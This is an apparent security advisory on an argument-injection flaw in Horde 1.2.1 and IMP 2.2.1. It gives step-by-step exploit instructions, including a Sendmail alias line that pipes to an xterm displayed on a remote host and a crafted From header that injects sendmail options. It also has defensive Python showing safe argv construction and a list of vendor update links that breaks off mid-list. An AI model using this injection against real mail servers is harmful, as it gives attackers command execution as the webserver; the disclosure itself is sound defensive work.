COMMAND

    IMP

SYSTEMS AFFECTED

    Horde v1.2.1 & IMP v2.2.1

PROBLEM

    Jens Steube found the following. The fix for the first detected
    problem with the $from variable in the Horde library only escaped
    shell characters, which prevents direct command execution. It is
    still possible to exploit the parsed $from line and execute
    commands under the uid and gid of the webserver. This has been
    tested under Debian 2.2 (potato).

    Example exploit setup: Horde and IMP, with Sendmail (v8.11.0) as
    the MTA.

    0. The job is to send a mail to an address which is defined in an
       alias file which is manually added to Sendmail. This alias
       pipes to a command.
    1. Log on to IMP and open a compose window.
    2. Locally open a text editor and write a line in MTA alias-file
       format. After that, save it locally. Example line:

        evil@localhost: "|/usr/X11R6/bin/xterm -display 192.168.4.8:0.0"

    3. Upload the locally stored file as an attachment.
    4. Open the HTML source code of the compose window and search for
       '/tmp'.
    5. You will find the filename and path under which the attachment
       is stored on the webserver. Copy it to the clipboard. Note
       that the filename looks like /tmp/php??????.att
    6. Just close the compose window!
    7. Open a new compose window.
    8. As your FROM line, insert a line such as the following
       (including all quote types):

        <"x@x -O QueueDirectory=/tmp -O AliasFile=(insert Clipboard) -Fx">

    9. As your TO line, insert the user alias which you defined in
       the uploaded attachment.

        e.g.: evil@localhost

    10. Leave all other fields blank and send the mail.
    11. Exploited.

    The above exploit works with Sendmail in most configurations, but
    other MTAs could also be exploited the same way. Note that just
    disabling the AliasFile flag is not enough to prevent attacks on
    this bug, because most MTAs also provide other command-line
    switches to include external configuration.
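
    Why escaping shell characters is not enough, and what a caller can
    do instead, as an added example (not Horde or IMP code). The
    escaping routine, the sendmail path and the sample From value are
    constructed assumptions.

```python
import re
import shlex

SENDMAIL = "/usr/sbin/sendmail"  # assumed path

# Assumed stand-in for "escaping shell characters"; the actual Horde 1.2.1
# routine is not shown in the advisory.
SHELL_META = re.compile(r"""([;&|`$<>(){}\[\]*?~#!\\\n'"])""")

# Conservative address shape: no whitespace, no leading '-', no quoting.
ADDR = re.compile(r"[A-Za-z0-9][A-Za-z0-9._+-]*@[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?")


def escape_shell_meta(value):
    """Backslash-escape shell metacharacters; spaces and '-' pass through."""
    return SHELL_META.sub(r"\\\1", value)


def argv_after_escaping(from_value):
    """Interpolate the escaped From value into a command string and split it
    the way /bin/sh would, returning the argv the MTA receives."""
    return shlex.split(SENDMAIL + " -i -f" + escape_shell_meta(from_value))


def safe_argv(sender, recipients):
    """Validate every address, then build an argv list for exec without a
    shell; '--' ends option parsing before the recipients."""
    for addr in [sender, *recipients]:
        if not ADDR.fullmatch(addr):
            raise ValueError("rejected address: %r" % (addr,))
    return [SENDMAIL, "-i", "-f", sender, "--", *recipients]


if __name__ == "__main__":
    crafted = "x@example.org -O Option=value"  # constructed sample input
    print(argv_after_escaping(crafted))  # '-O' arrives as its own option
    print(safe_argv("user@example.org", ["rcpt@example.org"]))
    try:
        safe_argv(crafted, ["rcpt@example.org"])
    except ValueError as exc:
        print(exc)
```

    Because the check is on the shape of the address and the argv is
    built without a shell, it does not depend on which option an MTA
    happens to accept.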

SOLUTION

    There's an update available which should be a more complete fix.
    The Horde team announced the availability of IMP 2.2.2 -- this
    version is "part 2" to a security vulnerability present in 2.2.0
    (and earlier "pre" releases) that was only partially fixed in
    2.2.1. Users of IMP 2.2 on production systems are STRONGLY
    ENCOURAGED to upgrade.

    For Conectiva Linux:

        ftp://atualizacoes.conectiva.com.br/4.1/noarch/horde-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/noarch/horde-mysql-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/noarch/horde-pgsql-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/noarch/horde-shm-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/noarch/imp-2.2.2-1cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-doc-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-gd-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-imap-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-ldap-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-mysql-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-pgsql-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-xml-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/apache-1.3.12-8cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/apache-devel-1.3.12-8cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/apache-doc-1.3.12-8cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/noarch/horde-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/noarch/horde-mysql-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/noarch/horde-pgsql-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/noarch/horde-shm-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/noarch/imp-2.2.2-1cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-doc-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-gd-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-imap-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-ldap-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-mysql-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-pgsql-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-xml-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/apache-1.3.12-8cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/apache-devel-1.3.12-8cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/apache-doc-1.3.12-8cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/noarch/horde-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/noarch/horde-mysql-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/noarch/horde-pgsql-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/noarch/horde-shm-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/noarch/imp-2.2.2-1cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-doc-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-gd-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-imap-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-ldap-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-mysql-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-pgsql-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-xml-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/noarch/horde-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/noarch/horde-mysql-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/noarch/horde-pgsql-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/noarch/horde-shm-1.2.2-2cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/noarch/imp-2.2.2-1cl.noarch.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-doc-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-gd-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-imap-3.0.16-6cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-ldap-3.0.16-6cl.i386.rpm